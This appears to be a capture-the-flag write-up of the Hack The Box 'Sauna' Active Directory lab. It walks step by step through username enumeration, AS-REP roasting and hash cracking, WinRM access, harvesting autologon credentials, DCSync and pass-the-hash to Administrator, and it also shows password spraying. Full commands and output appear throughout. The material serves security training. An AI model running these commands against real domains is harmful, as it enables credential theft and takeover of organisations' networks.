Overview

The machine starts by LDAP null bind enumeration and website OSINT that reveals staff names to build a username list, using kerbrute with downgraded encryption we find fsmith is vulnerable to AS-REP roasting and crack the hash to get winrm access, then winPEAS reveals autologon credentials for svc_loanmgr stored in the registry, that account has DCSync rights so we dump domain hashes and pass-the-hash as Administrator to get root.

Enumeration

as usual we'll start with nmap scan

and we've got active directory environment with the domain name EGOTISTICAL-BANL.LOCAL and a big clock skew if we are gonna deal with Kerberos

so setup the environment and move on

bash
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ echo '10.129.95.180 EGOTISTICAL-BANK.LOCAL' | sudo tee -a /etc/hosts
10.129.95.180 EGOTISTICAL-BANK.LOCAL
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ sudo ntpdate EGOTISTICAL-BANK.LOCAL
2026-06-09 07:02:18.965036 (-0700) +25201.171696 +/- 0.037343 EGOTISTICAL-BANK.LOCAL 10.129.95.180 s1 no-leap
CLOCK: time stepped by 25201.171696
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc smb 10.129.95.180 -u '' -p '' --generate-krb5-file krb5.conf
SMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.95.180 445 SAUNA [+] krb5 conf saved to: krb5.conf
SMB 10.129.95.180 445 SAUNA [+] Run the following command to use the conf file: export KRB5_CONFIG=krb5.conf
SMB 10.129.95.180 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ sudo mv krb5.conf /etc/krb5.conf

Guest and Null bind

so I always start with listing shares accessible by the Guest user but the account is disabled in this case

bash
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc smb 10.129.95.180 -u 'Guest' -p '' --shares
SMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True)
(SMBv1:None) (Null Auth:True)
SMB 10.129.95.180 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\Guest: STATUS_ACCOUNT_DISABLED

so i tried also the null bind with ldap and it is valid but trying to list the users returned nothing

bash
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc ldap 10.129.95.180 -u '' -p ''
LDAP 10.129.95.180 389 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:None) (cha
nnel binding:No TLS cert)
LDAP 10.129.95.180 389 SAUNA [+] EGOTISTICAL-BANK.LOCAL\:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc ldap 10.129.95.180 -u '' -p '' --users
LDAP 10.129.95.180 389 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:None) (cha
nnel binding:No TLS cert)
LDAP 10.129.95.180 389 SAUNA [+] EGOTISTICAL-BANK.LOCAL\:
LDAP 10.129.95.180 389 SAUNA [*] Enumerated 0 domain users: EGOTISTICAL-BANK.LOCAL
LDAP 10.129.95.180 389 SAUNA -Username- -Last PW Set- -BadPW- -Description-

Usually this is weird but I had a case like this lately and this was because some users wasn't in the user container and it was in a custom OU or maybe we got read restriction so lets use ldapsearch to list all objects and try to make sense of it

i will use the root as the search base and all objects for the class ldapsearch -H ldap://10.129.95.180 -x -b "dc=EGOTISTICAL-BANK,dc=LOCAL" "(objectClass=*)"

and this is a SNIP of the output and the only thing that looks like a user here is this Hugo Smith user so lets do some enumeration about it

and even though the null bind is valid we got restricted read access but I guess the user should be enough lets look if it doesn't require pre-auth

bash
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ ldapsearch -H ldap://10.129.95.180 -x -b "CN=Hugo Smith,dc=EGOTISTICAL-BANK,dc=LOCAL" "*"
# extended LDIF
#
# LDAPv3
# base <CN=Hugo Smith,dc=EGOTISTICAL-BANK,dc=LOCAL> with scope subtree
# filter: (objectclass=*)
# requesting: *
#

# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

I created a list of possible usernames using Hugo's name cause I don't know the domain naming convention

plaintext
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ username-anarchy Hugo Smith
hugo
hugosmith
hugo.smith
hugosmit
hugos
h.smith
hsmith
shugo
s.hugo
smithh
smith
smith.h
smith.hugo
hs

using that list we got the username hsmith is valid but it isn't vulnerable to AS-REP roasting

bash
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ kerbrute userenum -d EGOTISTICAL-BANK.LOCAL --downgrade --dc 10.129.95.180 hugo.usernames

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: dev (n/a) - 06/09/26 - Ronnie Flathers @ropnop

2026/06/09 07:23:34 > Using downgraded encryption: arcfour-hmac-md5
2026/06/09 07:23:34 > Using KDC(s):
2026/06/09 07:23:34 > 10.129.95.180:88

2026/06/09 07:23:34 > [+] VALID USERNAME: hsmith@EGOTISTICAL-BANK.LOCAL
2026/06/09 07:23:34 > Done! Tested 14 usernames (1 valid) in 0.436 seconds

So we pretty much got nothing for now except this username and it would be very hard to brute-force the password as It will take too much time and I don't think this is the intended path

Website

I almost missed this in the nmap results cause we got HTTP port exposed that I thought it was IIS default page but looking back at it, it got an HTTP title for the bank so lets take a look

plaintext
80/tcp   open  http          syn-ack Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE

Looking at it, it is a static website but this about.html page leaks some possible usernames other than hsmith but now at least we know the naming convention is flast for username-anarchy so lets add those to a file and create a list of their possible usernames ss_20260609_072900.png

the command for it looks like this and you can check the help for more cool stuff

bash
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ username-anarchy --input-file ./staff.txt --select-format flast
fsmith
scoins
hbear
btylor
sdriver
skerb

and we got one more valid username but this time it is vulnerable to AS-REP roast, just so you know we used --downgrade to downgrade the encryption type from etype18 to etype23 which is HMAC-RC4 which is just md5 meaning it'll be easier to crack but if we didn't use we would get AES-128 or AES-256 based on what's being configured on the DC

bash
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ kerbrute userenum -d EGOTISTICAL-BANK.LOCAL --downgrade --dc 10.129.95.180 usernames.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: dev (n/a) - 06/09/26 - Ronnie Flathers @ropnop

2026/06/09 07:32:12 > Using downgraded encryption: arcfour-hmac-md5
2026/06/09 07:32:12 > Using KDC(s):
2026/06/09 07:32:12 > 10.129.95.180:88

2026/06/09 07:32:12 > [+] fsmith has no pre auth required. Dumping hash to crack offline:
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:c70f1a164cacf53deee90fec84d355c2$3f742bb7635f6519cc259475fbf9212e63b16e9b01163ee98f2592fc89d16cefccc7ad31e9da7c1f02eff29cf018398479f1be73f8d76bcf3417d8385b8d108a474946a0fecf73c1435699f84aedc8bfc6cec4c8523977ed615aa8c5c9b141f112939e291a2aeb7616c3d250f4af9fc037c239821b12162867c506e57c6876ee2254abd2416cfebf3967ae49bd7c97b5034c86db01dddd3df26e3a2bf59ec934929ffef41645fa979054fe691e5a2d5254a9b0ac91ed30fe35c54959e54ce475c468f2152d5f16bd6eba3c3f538ec44265ffbd32ae699d733f68e4dcd22f690d1957f6c066f973cdcde765ebf567e8f0296ec9e514bd377b587e2cec16ad08d7
2026/06/09 07:32:12 > [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCAL

and you can find it here it is etype18 which will be kinda impossible to crack

bash
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ kerbrute userenum -d EGOTISTICAL-BANK.LOCAL --dc 10.129.95.180 usernames.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: dev (n/a) - 06/09/26 - Ronnie Flathers @ropnop

2026/06/09 07:32:58 > Using KDC(s):
2026/06/09 07:32:58 > 10.129.95.180:88

2026/06/09 07:32:58 > [+] fsmith has no pre auth required. Dumping hash to crack offline:
$krb5asrep$18$fsmith@EGOTISTICAL-BANK.LOCAL:f72e72093ac843cd3bbb4b00151f90bd$e6110acf09a061b118ef013cbbda89251a10fb1c5b4a12ab87f5bbf9204130d1c3fd8da9790ae301ba980812790d291f72455bfab01415efb68f573fbe415724581b91b59b16b6098afcbfc867ae67af0bc5223858c51cc04b04aca4e18e3b56aad4eb4e4592f0636c1f86850e759ac7dd53bd4166ac645d4c79a2b44f8c2f195ffa1798af70d066da103f44269dd20b134b6e8ef83285ffdb4923f9d0d7bacadf6c98ec7172d3f6fb1216293df0026147abc769de780ddd8b4e69b11531c0b0e6e206afe0ed024e9a1eceb36f5ae97de19a11133582706cdf8f229bd5b4c1e6ac1cf7cacb761f390a1b519285cf073bcd028e20dd4b5072afae74f8758748889202f1cbbeb6bd91bac63d568683bdc466748591af50
2026/06/09 07:32:58 > [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCAL
2026/06/09 07:32:58 > Done! Tested 6 usernames (1 valid) in 0.243 seconds

Last thing to prove my point here lok at this, the type is 18 but hashcat usually expects it to be etype23 cause it is easier to crack and we can change the mode explicitly but it'll waste time

bash
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$18$fsmith@EGOTISTICAL-BANK.LOCAL:ed83c8b...8873e1
Time.Started.....: Tue Jun  9 07:35:38 2026 (22 secs)
Time.Estimated...: Tue Jun  9 07:36:00 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:   673.4 kH/s (2.26ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: kristenanne -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#01.: Util: 89%

but the etype got crack and we got a password for fsmith

bash

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:cd7487fab51e2e9ad69467c41ea0b77d$9d7827aba331b7cf0100352d62bbafdb21ac308ce20f3cea3f2e4992d9ad544e5416889c1aeab953e844f0a25e8f32203495d009d15dd3ab
19fd4904455146254be8fa4e0556bb1a4066ef69f31a47067d09475e19782b0bc4f4dfc5b2b3c4902e7f17b23a23a3c8a348f3cab76f922630cc77afa17cdc3889bbc12e070c4134ce228241e74647ec612c0d9e29da4b8ca101fc2a90a1a
a73a008f754409ff93463802867f122b9ae592785356a26e21094e4fdc5e76663f4b9bfa84dc33c4e8fd041979af99ebf36514d90e3113f6990b123b43cbe31727c215f436219243746f9cf6e67da99d3eb359712930b6684abd0199ba0d7
bada606b7f52e7128d9ca9:Thestrokes23
Approaching final keyspace - workload adjusted.

Shell as fsmith

and we got it working for smb and there is a share that we can write to

bash
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc smb 10.129.95.180 -u fsmith -p Thestrokes23 --shares
SMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.95.180 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23
SMB 10.129.95.180 445 SAUNA [*] Enumerated shares
SMB 10.129.95.180 445 SAUNA Share Permissions Remark
SMB 10.129.95.180 445 SAUNA ----- ----------- ------
SMB 10.129.95.180 445 SAUNA ADMIN$ Remote Admin
SMB 10.129.95.180 445 SAUNA C$ Default share
SMB 10.129.95.180 445 SAUNA IPC$ READ Remote IPC
SMB 10.129.95.180 445 SAUNA NETLOGON READ Logon server share
SMB 10.129.95.180 445 SAUNA print$ READ Printer Drivers
SMB 10.129.95.180 445 SAUNA RICOH Aficio SP 8300DN PCL 6 WRITE We cant print money
SMB 10.129.95.180 445 SAUNA SYSVOL READ Logon server share

but we also can access WINRM so lets get a shell

bash
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc winrm 10.129.95.180 -u fsmith -p Thestrokes23
WINRM 10.129.95.180 5985 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
WINRM 10.129.95.180 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)

and we got user

bash
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ winrmexec EGOTISTICAL-BANK.LOCAL/fsmith:Thestrokes23@10.129.95.180
'prompt_toolkit' not installed, using built-in 'readline'
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] '-target_ip' not specified, using 10.129.95.180
[*] '-port' not specified, using 5985
[*] '-url' not specified, using http://10.129.95.180:5985/wsman
PS C:\Users\FSmith\Documents> cat ../Desktop/user.txt
0efd2e511c26676e9e3274b5c2f771b7
PS C:\Users\FSmith\Documents>

the privileges and groups for this user are fine so lets try to see if we got permission over any user in the domain

I've got bloodhound up and running but nothing came back, it was just a normal user with no outbound objects so I am back to the shell to run winPeas

AutoLogon

Windows Autologon passwords are ==stored credentials used by the operating system to automatically log into a specific user account during startup==. This feature bypasses the standard login screen to provide convenience for kiosks, public displays, and shared lab computers

and after running winPEAS it returned an autologon password for a user

plaintext
ÉÍÍÍÍÍÍÍÍÍ͹ Home folders found (T1083)
    C:\Users\Administrator
    C:\Users\All Users
    C:\Users\Default
    C:\Users\Default User
    C:\Users\FSmith : FSmith [Allow: AllAccess]
    C:\Users\Public
    C:\Users\svc_loanmgr

ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials (T1552.002)
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!

trying to login got failure cause the username isn't as it appears in winPEAS results

bash
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc smb 10.129.95.180 -u svc_loanmanager -p Moneymakestheworldgoround!
SMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.95.180 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\svc_loanmanager:Moneymakestheworldgoround! STATUS_LOGON_FAILURE

when i went back to bloodhound I found out that the user SVC_LOANMGR got DCSync rights so lets try this username instead Pasted image 20260609113400.png and it is valid credentials for this user

bash
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc smb 10.129.95.180 -u svc_loanmgr -p Moneymakestheworldgoround!
SMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.95.180 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround!

A DCSync attack is a post-exploitation technique used by threat actors to steal sensitive credentials directly from an organization's Active Directory (AD). It works by tricking a legitimate Domain Controller into believing the attacker's machine is another Domain Controller requesting a data sync

so lets dump secrets and use administrator hash

and we got root

bash
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ winrmexec EGOTISTICAL-BANK.LOCAL/administrator:@10.129.95.180 -hashes :823452073d75b9d1cf70ebdf86c7f98e
'prompt_toolkit' not installed, using built-in 'readline'
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] '-target_ip' not specified, using 10.129.95.180
[*] '-port' not specified, using 5985
[*] '-url' not specified, using http://10.129.95.180:5985/wsman
PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
287a09705351b7b12056d70fc6c4aa57
PS C:\Users\Administrator\Documents>

Beyond root

you also could've read the Password through the registry yourself if you can't upload a tool in more restricted environment then you can get a list of users using fsmith creds and password spray like this

then list the users using fsmith and password spray

bash
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc ldap 10.129.95.180 -u fsmith -p Thestrokes23 --users-export users.txt
LDAP 10.129.95.180 389 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.95.180 389 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23
LDAP 10.129.95.180 389 SAUNA [*] Enumerated 6 domain users: EGOTISTICAL-BANK.LOCAL
LDAP 10.129.95.180 389 SAUNA -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.95.180 389 SAUNA Administrator 2021-07-26 09:16:16 0 Built-in account for administering the computer/domain
LDAP 10.129.95.180 389 SAUNA Guest < never> 0 Built-in account for guest access to the computer/domain
LDAP 10.129.95.180 389 SAUNA krbtgt 2020-01-22 21:45:30 0 Key Distribution Center Service Account
LDAP 10.129.95.180 389 SAUNA HSmith 2020-01-22 21:54:34 40
LDAP 10.129.95.180 389 SAUNA FSmith 2020-01-23 08:45:19 0
LDAP 10.129.95.180 389 SAUNA svc_loanmgr 2020-01-24 15:48:31 0
LDAP 10.129.95.180 389 SAUNA [*] Writing 6 local users to users.txt
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc smb 10.129.95.180 -u users.txt -p 'Moneymakestheworldgoround!'
SMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.95.180 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\Administrator:Moneymakestheworldgoround! STATUS_LOGON_FAILURE
SMB 10.129.95.180 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\Guest:Moneymakestheworldgoround! STATUS_LOGON_FAILURE
SMB 10.129.95.180 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\krbtgt:Moneymakestheworldgoround! STATUS_LOGON_FAILURE
SMB 10.129.95.180 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\HSmith:Moneymakestheworldgoround! STATUS_LOGON_FAILURE
SMB 10.129.95.180 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\FSmith:Moneymakestheworldgoround! STATUS_LOGON_FAILURE
SMB 10.129.95.180 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround!

Resources